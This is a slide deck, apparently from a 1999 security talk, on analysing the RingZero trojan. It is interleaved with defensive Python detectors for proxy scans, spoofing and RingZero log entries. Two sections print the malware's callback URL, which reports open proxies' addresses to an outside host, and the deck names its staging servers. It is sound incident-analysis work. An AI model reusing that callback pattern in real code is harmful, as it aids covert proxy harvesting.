The Hunt For RingZero

John Green, [email protected]

Outline

• A word about Trojans
• Getting a clue
• Looking for data
• How many source hosts?
• The hunt for the Trojan
• Game over
• BoF Findings


Trojans

This is Roland’s home computer, connected to an ISP


Trojans

“Driving the Bus”, NETBUS

Deep Throat - 2140

200.31.13.8 > 158.12.110.1.2140: udp 24
    4500 001e e104 0000 7111 8795 ac14 0d08
    c0a8 6e01 ea60 085c 000a fbb7 3030 8080
    0001 0001 0000 0000 0664 6f6e 616c

200.31.13.8 > 158.12.110.2.2140: udp 24
    4500 001e e204 0000 7111 8694 ac14 0d08
    c0a8 6e02 ea60 085c 000a fbb6 3030 0000
    0001 0000 0000 0000 0331 3831 0231
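The trace above is a tcpdump -x style hex dump, and the Deep Throat probe it shows is a UDP datagram to port 2140 carrying the two-byte payload "00" (hex 3030). The following decoder is an added example, not code from the talk: it turns the slide's hex words back into an IPv4/UDP datagram, cuts the payload at the IP total length (the bytes after it are whatever tcpdump found in the capture buffer, not data the sender chose), and checks the Deep Throat pattern. Note that the addresses inside the hex (172.20.13.8 to 192.168.110.1) were sanitized and do not match the printed header line; the function names and the probe test are mine.

```python
"""Decode one of the slide's tcpdump -x hex dumps and test it against the
Deep Throat probe the trace shows (UDP to port 2140, payload "00").
Added example; hex copied from the slide, helper names are the editor's."""
import socket
import struct

DEEP_THROAT_PORT = 2140      # Deep Throat server port seen in the trace
DEEP_THROAT_PROBE = b"00"    # the "3030" payload in the dump

# First packet from the slide, as the 16-bit words tcpdump -x prints.
# The hex addresses (172.20.13.8 -> 192.168.110.1) are sanitized and do not
# match the printed header line (200.31.13.8 > 158.12.110.1).
SLIDE_PACKET_HEX = (
    "4500 001e e104 0000 7111 8795 ac14 0d08 "
    "c0a8 6e01 ea60 085c 000a fbb7 3030 8080 "
    "0001 0001 0000 0000 0664 6f6e 616c"
)


def hexdump_to_bytes(dump):
    """Join the whitespace-separated hex words tcpdump prints into raw bytes."""
    return bytes.fromhex("".join(dump.split()))


def parse_ipv4_udp(raw):
    """Parse IPv4 + UDP headers from raw bytes.

    Returns a dict of the interesting fields, or None when the bytes are not
    an IPv4/UDP datagram.  The payload is cut at the IP total length rather
    than the capture length, because tcpdump keeps printing whatever followed
    the datagram in the capture buffer (Ethernet padding or stale data).
    """
    if len(raw) < 20 or raw[0] >> 4 != 4:
        return None
    ihl = (raw[0] & 0x0F) * 4
    total_len = struct.unpack("!H", raw[2:4])[0]
    ttl, proto = raw[8], raw[9]
    if proto != 17 or len(raw) < ihl + 8:
        return None
    sport, dport, udp_len, _csum = struct.unpack("!HHHH", raw[ihl:ihl + 8])
    end = min(total_len, ihl + udp_len, len(raw))
    return {
        "src": socket.inet_ntoa(raw[12:16]),
        "dst": socket.inet_ntoa(raw[16:20]),
        "ttl": ttl,
        "sport": sport,
        "dport": dport,
        "payload": raw[ihl + 8:end],
        "trailing": raw[total_len:],   # bytes past the datagram: not payload
    }


def is_deep_throat_probe(pkt):
    """True when a decoded packet matches the probe pattern in the trace."""
    return (pkt is not None
            and pkt["dport"] == DEEP_THROAT_PORT
            and pkt["payload"] == DEEP_THROAT_PROBE)


def decode_slide_packet():
    """Decode the embedded slide packet."""
    return parse_ipv4_udp(hexdump_to_bytes(SLIDE_PACKET_HEX))


if __name__ == "__main__":
    pkt = decode_slide_packet()
    print(pkt)
    print("deep throat probe:", is_deep_throat_probe(pkt))
```

The arriving TTL of 0x71 (113) is also worth keeping from this decode: with a default initial TTL of 128 it puts the sender about 15 hops away, the same kind of reasoning used later in the talk to argue the sources were not spoofed.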

Trojans Review

• The most well known trojan programs are Netbus and Back Orifice

• Protective tools include: all major anti-virus tools, Nuke Nabber, NFR's Back Officer Friendly and AtGuard

Getting A Clue

• Sept 19, 1999 - Roland Grefer writes with an AtGuard detect from his home.com cable modem

• We both commented that probes to TCP port 3128 are not that common

AtGuard, http://www.atguard.com

More Clues

• Sept 21, 1999 - SHADOW analyst Adena Bushrod reports similar activity

• Contacted other organizations: MITRE, ARL

• They see it too!

Proxy Scanning

08:58:35 ghostrid3r.1606 > 192.168.2.1.80: S(0)
08:58:36 ghostrid3r.1607 > 192.168.2.1.8080: S(0)
08:58:37 ghostrid3r.1609 > 192.168.2.1.3128: S(0)
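The three SYNs above are the signature the rest of the talk keys on: one source walking ports 80, 8080 and 3128 on one target, a second apart. The detector below is an added example (not SHADOW's code or anything from the talk): it parses lines in the slide's "time src.port > dst.port: S(...)" shape, groups them by (source, destination) and reports every 80, 8080, 3128 run that completes inside a short window. The sample lines are constructed for the demo; only the first three are the ones on the slide, and the window size is the editor's choice.

```python
"""Find the 80 -> 8080 -> 3128 SYN triplet in tcpdump-style lines.
Added example; the log lines are constructed, the first three are the
slide's own."""
import re
from collections import defaultdict

# "HH:MM:SS src.sport > dst.dport: S(...)" as on the slide (src may be a name).
SYN_RE = re.compile(r"^(\d\d):(\d\d):(\d\d) (\S+?)\.(\d+) > (\S+?)\.(\d+): S")

RINGZERO_PORTS = (80, 8080, 3128)   # order matters: the scanner walks them

SAMPLE_LINES = [
    "08:58:35 ghostrid3r.1606 > 192.168.2.1.80: S(0)",
    "08:58:36 ghostrid3r.1607 > 192.168.2.1.8080: S(0)",
    "08:58:37 ghostrid3r.1609 > 192.168.2.1.3128: S(0)",
    "09:12:01 10.0.0.7.2044 > 192.168.2.1.80: S(0)",          # ordinary web hit
    "09:30:10 203.0.113.5.1100 > 192.168.2.9.80: S(0)",
    "09:30:11 203.0.113.5.1101 > 192.168.2.9.8080: S(0)",
    "09:30:12 203.0.113.5.1103 > 192.168.2.9.3128: S(0)",
    "10:00:00 198.51.100.2.3000 > 192.168.2.1.8080: S(0)",   # 8080/3128 only
    "10:00:01 198.51.100.2.3001 > 192.168.2.1.3128: S(0)",
    "11:00:00 192.0.2.9.4000 > 192.168.2.1.80: S(0)",        # right ports,
    "11:05:00 192.0.2.9.4001 > 192.168.2.1.8080: S(0)",      # but minutes apart
    "11:10:00 192.0.2.9.4002 > 192.168.2.1.3128: S(0)",
]


def parse_syn(line):
    """Return (seconds, time_str, src, dst, dport) or None for other lines."""
    m = SYN_RE.match(line)
    if not m:
        return None
    hh, mm, ss, src, _sport, dst, dport = m.groups()
    return (int(hh) * 3600 + int(mm) * 60 + int(ss), f"{hh}:{mm}:{ss}",
            src, dst, int(dport))


def find_proxy_scan_triplets(lines, window=10):
    """Return [(src, dst, start_time)] for every 80, 8080, 3128 SYN run from
    one source to one destination that completes within `window` seconds."""
    by_pair = defaultdict(list)
    for line in lines:
        p = parse_syn(line)
        if p:
            secs, tstr, src, dst, dport = p
            by_pair[(src, dst)].append((secs, tstr, dport))
    hits = []
    for (src, dst), events in by_pair.items():
        events.sort()
        for i in range(len(events) - 2):
            ports = tuple(e[2] for e in events[i:i + 3])
            if ports == RINGZERO_PORTS and events[i + 2][0] - events[i][0] <= window:
                hits.append((src, dst, events[i][1]))
    return sorted(hits, key=lambda h: h[2])


def scanning_sources(lines, window=10):
    """Distinct sources that produced at least one full triplet."""
    return sorted({src for src, _, _ in find_proxy_scan_triplets(lines, window)})


if __name__ == "__main__":
    for hit in find_proxy_scan_triplets(SAMPLE_LINES):
        print("proxy scan triplet:", hit)
    print("sources:", scanning_sources(SAMPLE_LINES))
```

Requiring the full ordered run is deliberate: a lone SYN to 3128 is what a firewall log records, and it is enough to count sources, but the ordered 80/8080/3128 walk is what separates this scanner from a stray Squid client or a single misdirected web request.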

How Big Is This Thing?!

Intrusion detection systems ranging from home computers with cable modems to high end government facilities have been reporting a large number of probes to TCP port 3128, the Squid proxy service. If your site has a network monitoring capability and you DO NOT run Squid and you detect this pattern over the next two weeks, please let us know by sending email to [email protected] with "intrusion 3128" in the subject line. If you are allowed to send the data trace, please sanitize any of your site's network information (destination host address) and send the data trace as well. Thank you!

BIG!

Over 300 3128 Messages In Three Days

29;23Sep1999; 7:59:21;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64052;48;25;
30;23Sep1999; 7:59:24;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64053;48;25;
31;23Sep1999; 8:07:30;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;196.15.173.2;xxx.yyy.214.101;3128;64025;44;48;
32;23Sep1999; 8:24:05;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;209.203.121.119;xxx.yyy.124.154;3128;3820;48;25;
33;23Sep1999; 8:24:11;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;194.51.132.171;xxx.yyy.170.248;3128;1195;44;25;
34;23Sep1999; 8:59:23;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;156.46.64.149;xxx.yyy.135.194;3128;2570;44;48;
35;23Sep1999; 9:00:49;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.51.132.171;xxx.yyy.214.228;3128;2932;44;48;
36;23Sep1999; 9:14:51;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;195.44.9.20;xxx.yyy.95.90;3128;1089;44;25;
37;23Sep1999; 9:33:38;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;212.130.192.222;xxx.yyy.139.66;3128;2678;48;48;
38;23Sep1999; 9:40:13;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;193.125.239.105;xxx.yyy.1.31;3128;1531;48;48;
39;23Sep1999; 9:56:08;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.249.154.21;xxx.yyy.27.35;3128;2515;44;48;
40;23Sep1999; 9:57:40;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;200.14.243.166;xxx.yyy.123.25;3128;4879;48;25;

Over 1000 Source Hosts!
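"How many source hosts?" is a counting question, and the semicolon-separated export above is what you have to count from. The parser below is an added example, not from the talk: it reads the twelve slide records (the layout looks like a Check Point FW-1 log export; the field names are the editor's reading of it, not a documented schema) and reports the numbers an analyst would want before deciding between "spoofed", "coordinated" and "malware": unique sources versus events, how the hits spread across sensors, and which sources were seen by more than one firewall.

```python
"""Count distinct source hosts in the slide's firewall export.
Added example; field names are an assumption about the export layout."""
from collections import Counter, defaultdict

FIELDS = ("num", "date", "time", "origin", "type", "action", "alert",
          "interface", "direction", "proto", "src", "dst", "service",
          "s_port", "len", "rule")

# The twelve records from the slide (site addresses already sanitized there).
SLIDE_RECORDS = """\
29;23Sep1999; 7:59:21;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64052;48;25;
30;23Sep1999; 7:59:24;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64053;48;25;
31;23Sep1999; 8:07:30;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;196.15.173.2;xxx.yyy.214.101;3128;64025;44;48;
32;23Sep1999; 8:24:05;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;209.203.121.119;xxx.yyy.124.154;3128;3820;48;25;
33;23Sep1999; 8:24:11;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;194.51.132.171;xxx.yyy.170.248;3128;1195;44;25;
34;23Sep1999; 8:59:23;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;156.46.64.149;xxx.yyy.135.194;3128;2570;44;48;
35;23Sep1999; 9:00:49;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.51.132.171;xxx.yyy.214.228;3128;2932;44;48;
36;23Sep1999; 9:14:51;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;195.44.9.20;xxx.yyy.95.90;3128;1089;44;25;
37;23Sep1999; 9:33:38;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;212.130.192.222;xxx.yyy.139.66;3128;2678;48;48;
38;23Sep1999; 9:40:13;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;193.125.239.105;xxx.yyy.1.31;3128;1531;48;48;
39;23Sep1999; 9:56:08;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.249.154.21;xxx.yyy.27.35;3128;2515;44;48;
40;23Sep1999; 9:57:40;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;200.14.243.166;xxx.yyy.123.25;3128;4879;48;25;
"""


def parse_record(line):
    """Split one export line into a dict; None for short or blank lines."""
    parts = [p.strip() for p in line.split(";")]
    if len(parts) < len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    rec["service"] = int(rec["service"])   # destination port
    rec["s_port"] = int(rec["s_port"])     # source port
    return rec


def load_records(text):
    return [r for r in (parse_record(ln) for ln in text.splitlines()) if r]


def summarize_3128(records):
    """Answer the 'how many source hosts?' question for TCP/3128 events."""
    hits = [r for r in records if r["proto"] == "tcp" and r["service"] == 3128]
    sensors_by_src = defaultdict(set)
    for r in hits:
        sensors_by_src[r["src"]].add(r["origin"])
    per_src = Counter(r["src"] for r in hits)
    return {
        "events": len(hits),
        "unique_sources": len(sensors_by_src),
        "unique_destinations": len({r["dst"] for r in hits}),
        "by_action": dict(Counter(r["action"] for r in hits)),
        "by_sensor": dict(Counter(r["origin"] for r in hits)),
        # sources that hit us more than once, and sources seen by >1 firewall
        "repeat_sources": sorted(s for s, c in per_src.items() if c > 1),
        "multi_sensor_sources": sorted(s for s, v in sensors_by_src.items()
                                       if len(v) > 1),
    }


if __name__ == "__main__":
    for key, value in summarize_3128(load_records(SLIDE_RECORDS)).items():
        print(f"{key}: {value}")
```

Even on twelve records the shape is visible: nearly one distinct source per event, targets scattered over the whole site, and a source (194.51.132.171) that shows up at two different sensors an hour apart. Scaled to the 300-plus messages the talk collected, that is the "over 1000 source hosts" figure, and it is the ratio of sources to events, not the raw count, that argues against a single scanner.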

What Are The Possibilities? > 1000 Source Hosts

• Spoofed
• World's largest coordinated attack
• Trojan software or "malware"

Source Host Analysis

"I am almost certain that these are indeed live, non-spoofed hosts. First, I've dumped the tcpdump traffic with the arriving TTL values. I've done about a dozen traceroutes back to the source IP's and the hop counts are believably close. Also, other clues found in the tcpdump output itself appear to point to different hosts or a very wise crafter."

Judy Novak - ARL
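The check described above can be written down. The code below is an added example (not ARL's or the talk's): it guesses each packet's initial TTL from the usual OS defaults (32, 64, 128, 255), turns the arriving TTL into a reverse-path hop estimate, and compares that with the hop count of a traceroute back to the source. It also flags a "source" whose arriving TTL jumps around between packets, which is what a crafted-source flood from one machine tends to look like. The observations and the tolerance of four hops are constructed for the demo.

```python
"""Arriving-TTL versus traceroute sanity check for suspected spoofing.
Added example; observations and tolerance are constructed."""

COMMON_INITIAL_TTLS = (32, 64, 128, 255)   # typical OS defaults


def infer_initial_ttl(arriving_ttl):
    """Smallest common default TTL that is >= the arriving value."""
    for t in COMMON_INITIAL_TTLS:
        if arriving_ttl <= t:
            return t
    raise ValueError("TTL cannot exceed 255")


def hops_from_ttl(arriving_ttl):
    """Reverse-path hop estimate implied by the arriving TTL."""
    return infer_initial_ttl(arriving_ttl) - arriving_ttl


def ttl_consistent(arriving_ttl, traceroute_hops, tolerance=4):
    """Does the reverse-path estimate agree with the forward traceroute?

    Paths are asymmetric, so a few hops of slack is normal; a large gap
    means either spoofing or an unusual initial TTL."""
    return abs(hops_from_ttl(arriving_ttl) - traceroute_hops) <= tolerance


def assess_sources(observations, tolerance=4):
    """observations: {src: (arriving_ttls_seen, traceroute_hop_count)}.

    Returns {src: 'plausible' | 'ttl-varies' | 'mismatch'}."""
    verdicts = {}
    for src, (ttls, tr_hops) in observations.items():
        if max(ttls) - min(ttls) > 2:
            # one real host sits at one distance; wandering TTLs suggest
            # many crafted packets pretending to be it
            verdicts[src] = "ttl-varies"
        elif all(ttl_consistent(t, tr_hops, tolerance) for t in ttls):
            verdicts[src] = "plausible"
        else:
            verdicts[src] = "mismatch"
    return verdicts


# Constructed sample: (arriving TTLs observed, hops in traceroute back).
SAMPLE_OBSERVATIONS = {
    "203.0.113.5": ([113, 113], 16),      # 128 default, 15 hops vs 16
    "198.51.100.2": ([49, 49, 48], 14),   # 64 default, 15-16 hops vs 14
    "192.0.2.9": ([250, 250], 19),        # 255 default, 5 hops vs 19: odd
    "192.0.2.10": ([61, 118, 240], 12),   # TTL all over the place
}


if __name__ == "__main__":
    for src, verdict in assess_sources(SAMPLE_OBSERVATIONS).items():
        print(f"{src:14} {verdict}")
```

The inference is ambiguous once hop counts get large (a 64-default host 35 hops away arrives with TTL 29 and looks like a 32-default host 3 hops away), and routers that rewrite TTL break it entirely, which is why the quote says "believably close" rather than proven. It is a cheap first filter, and in this case the packets' other fields pointed the same way.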

The First Hot Tip - Sept 23

"We began receiving probes to 3128 on Wednesday, September 15th. The probes come in a triplet - first to TCP port 80, then 8080, then 3128. The probes appear to be going after random addresses. One finally hit a web server listening on port 80 so I got to see what it was doing. It sent the following request to the server:"

get http://www.rusftpsearch.net/cgi-bin/pst.pl/?pst_mode=writeip&pst_host=192.168.2.1&pst_port=3128

Anonymous

Later verified by four other sources.

So What?

"Just a couple additional pieces of information. I only probed back in a rather simple way about 5 machines and found none of those running finger, SMTP or FTP, though all were running TCP port 139, so I concluded (with a very small sample size) it was a Windows attack of some kind, though I admit this is a guess based on sketchy information."

Anonymous

Game Over?

"I am the Network Security Officer at Vanderbilt University. I have a system that was infected with a trojan called RingZero and was scanning for ports 80, 8080, and 3128. I have pieces of the code, specifically a file called its.exe and a file that was Ring0.vxd. I am still trying to find the original infected file and I suspect that it was a screen saver. If you would like more info give me a call."

Ron Marcum, Vanderbilt

Extreme BoF - Decoding RingZero

7PM - 2AM

My Thanks To All Involved!


Basic Game Plan

• Move the Vanderbilt files to a “safe” platform for examination

• Use strings and other unix utilities to examine the files

• Targeting mechanism was a primary interest

Hour 1 - Gameplan Deviation

• strings, etc. didn't get us very far

• RingZero uses Ian Luck’s “Petite” program to compress the executables

• Tim White volunteers to sacrifice his windows laptop


Hour 2 - Deliberate Infection

• Created a mini-network

• 2 computers, both running sniffers

• Unzipped the archive

• Two files: its.exe, pst.exe
– it was a "coin-toss"

Hour 3 - Examining ITS.EXE

• Ran its.exe
– removed itself from the desktop
– its.exe and Ring0.vxd placed in the \windows\system directory
– created an empty its.dat file

• No network activity….. :(

Traffic At Last!

• After rebooting, the infected machine started doing DNS queries for hosts named:
– phzforum.virtualave.net
– xoom.members.com

Now we’re getting somewhere!

So What Now?

• Created an entry in the infected machine's hosts file
– Gave it the IP address of the sniffer

• Infected machine started sending web requests on port 80

Hours 4 and 5 - Reconfiguring the Sniffer Machine

• Switched to Linux
• Ran Apache and tcpdump
• Apache logs showed that its.exe was trying to retrieve an its.dat file from the webservers
– phzforum.virtualave.net/its.dat
– xoom.members.com/harmer/its.dat


What Should Be In ITS.DAT?

• its.dat no longer existed on phzforum.virtualave.net

• Terminal room closed before we discovered the xoom.members.com connection

• its.dat was found the following morning, but it appears to be encrypted

Party Over? - Nope!

• Getting very late
• Oak Room closed
• Remaining BoF members relocated to a corner, downstairs in LaSalle's

Hours 6 and 7 - Running The PST.EXE File

• Ran PST.EXE
• Initial behavior was the same as the its.exe
– relocated itself, etc.

PST.EXE spewed packets to ports 80, 8080, and 3128!


PST.EXE Behavior

• Generated a small list of “random?” IP addresses

• Scanned all IPs for port 80, then 8080, and finally 3128

• Repeated


What Is It Doing Though?

• Since the scan was sequential, we were able to configure apache “on-the-fly” to answer web requests for IPs in the scan.

• Examining the Apache logs showed what we had hoped for:

The End Game

get http://www.rusftpsearch.net/cgi-bin/pst.pl/?pst_mode=writeip&pst_host=192.168.2.1&pst_port=3128

The proxy is being used to send its own IP address and proxy port home to the "mothership"!
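Two things showed up in the BoF's Apache logs: the its.dat fetches that its.exe made once the hosts file pointed it at the sniffer, and the pst.pl "writeip" request that pst.exe hands to any open proxy it finds (the proxy then carries the report home). The parser below is an added example, not the BoF's tooling: it reads Common Log Format lines and pulls out both kinds of request. The log lines are constructed (the callback URL is the slide's), the query parameter names pst_mode, pst_host and pst_port are the editor's reading of the garbled slide text, and the same matching works on a Squid access.log, where it is the proxy's own log that records the report it forwarded.

```python
"""Pull RingZero its.dat fetches and pst.pl 'writeip' callbacks out of
Common Log Format lines.  Added example; log lines are constructed and the
pst_* parameter names are an assumption."""
import re
from urllib.parse import urlsplit, parse_qs

# Common Log Format: host ident user [time] "request" status bytes
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)')

SAMPLE_LOG = """\
192.168.2.5 - - [15/Sep/1999:08:40:12 -0400] "GET /its.dat HTTP/1.0" 404 201
192.168.2.5 - - [15/Sep/1999:08:40:13 -0400] "GET /harmer/its.dat HTTP/1.0" 404 201
192.168.2.5 - - [15/Sep/1999:08:58:37 -0400] "get http://www.rusftpsearch.net/cgi-bin/pst.pl/?pst_mode=writeip&pst_host=192.168.2.1&pst_port=3128 HTTP/1.0" 404 201
10.0.0.7 - - [15/Sep/1999:09:12:01 -0400] "GET /index.html HTTP/1.0" 200 1423
"""


def parse_clf(line):
    """One CLF line -> dict, or None when the line does not parse."""
    m = CLF_RE.match(line)
    if not m:
        return None
    client, when, request, status, _size = m.groups()
    parts = request.split(" ")
    if len(parts) < 2:
        return None
    # the slide's client sent a lower-case "get"; normalise for comparison
    return {"client": client, "time": when, "method": parts[0].upper(),
            "url": parts[1], "status": int(status)}


def classify_ringzero(entry):
    """('its.dat', path) / ('callback', (mothership, reported_ip, port)) / None.

    Absolute URLs (what a client sends to a proxy) and plain paths are both
    handled because urlsplit copes with either."""
    if entry is None:
        return None
    u = urlsplit(entry["url"])
    path = u.path.lower()
    if path.endswith("/its.dat"):
        return ("its.dat", u.path)
    if path.rstrip("/").endswith("/cgi-bin/pst.pl"):
        q = parse_qs(u.query)
        if q.get("pst_mode") == ["writeip"]:
            host = q.get("pst_host", [""])[0]
            port = int(q.get("pst_port", ["0"])[0])
            return ("callback", (u.netloc, host, port))
    return None


def ringzero_findings(log_text):
    """[(client, method, kind, detail)] for every RingZero request found."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_clf(line)
        kind = classify_ringzero(entry)
        if kind:
            findings.append((entry["client"], entry["method"]) + kind)
    return findings


def reported_proxies(log_text):
    """(ip, port) pairs that callbacks in the log tried to report home."""
    return {detail[1:] for _, _, kind, detail in ringzero_findings(log_text)
            if kind == "callback"}


if __name__ == "__main__":
    for f in ringzero_findings(SAMPLE_LOG):
        print(f)
    print("proxies reported:", reported_proxies(SAMPLE_LOG))
```

The pst_host value is the address the scanner believes is an open proxy, which in the sinkhole was the sniffer's own IP. On a production proxy the same log line means the proxy has just told the mothership it is open, and the request should be blocked at the proxy, not merely logged.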

Review of Findings

• ITS.EXE attempts to retrieve files from various webservers

• PST.EXE is the active scanner
– doesn't require the its.dat file to run
– discovered proxies send their IPs to www.rusftpsearch.net

Questions Still Remain

• Infection mechanism?

• How does it start at boot time?

• What is the its.dat file for?
– Targeting
– Scan intensity dial
– Attack configuration

Implications?

Quantum leap in distributed attack technology

• Viral infection rates
• Configurable - its.dat
– scanning -> attacking?
• Automatic result consolidation


Thank you